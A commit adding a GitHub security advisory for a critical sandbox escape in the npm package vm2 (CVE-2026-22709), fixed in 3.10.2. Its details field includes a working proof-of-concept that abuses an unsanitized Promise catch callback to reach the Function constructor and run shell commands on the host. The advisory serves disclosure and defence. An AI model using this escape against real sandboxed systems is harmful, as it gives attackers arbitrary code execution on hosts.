Publish GHSA-99p7-6v5w-7xg8

advisory-database[bot] · advisory-database[bot] · commit 09c9afbf150a · 2026-01-26T19:00:17.000Z
diff --git a/advisories/github-reviewed/2026/01/GHSA-99p7-6v5w-7xg8/GHSA-99p7-6v5w-7xg8.json b/advisories/github-reviewed/2026/01/GHSA-99p7-6v5w-7xg8/GHSA-99p7-6v5w-7xg8.json
@@ -0,0 +1,70 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-99p7-6v5w-7xg8",
+  "modified": "2026-01-26T18:57:14Z",
+  "published": "2026-01-26T18:57:14Z",
+  "aliases": [
+    "CVE-2026-22709"
+  ],
+  "summary": "vm2 has a Sandbox Escape",
+  "details": "In vm2 for version 3.10.0, `Promise.prototype.then` `Promise.prototype.catch` callback sanitization can be bypassed. This allows attackers to escape the sandbox and run arbitrary code.\n\n```js\nconst { VM } = require(\"vm2\");\n\nconst code = `\nconst error = new Error();\nerror.name = Symbol();\nconst f = async () => error.stack;\nconst promise = f();\npromise.catch(e => {\n    const Error = e.constructor;\n    const Function = Error.constructor;\n    const f = new Function(\n        \"process.mainModule.require('child_process').execSync('echo HELLO WORLD!', { stdio: 'inherit' })\"\n    );\n    f();\n});\n`;\n\nnew VM().run(code);\n```\n\nIn lib/setup-sandbox.js, the callback function of `localPromise.prototype.then` is sanitized, but `globalPromise.prototype.then` is not sanitized. The return value of async functions is `globalPromise` object.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "vm2"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "3.10.2"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 3.10.1"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-99p7-6v5w-7xg8"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/patriksimek/vm2/commit/4b009c2d4b1131c01810c1205e641d614c322a29"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/patriksimek/vm2"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/patriksimek/vm2/releases/tag/v3.10.2"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-693",
+      "CWE-913",
+      "CWE-94"
+    ],
+    "severity": "CRITICAL",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-01-26T18:57:14Z",
+    "nvd_published_at": null
+  }
+}
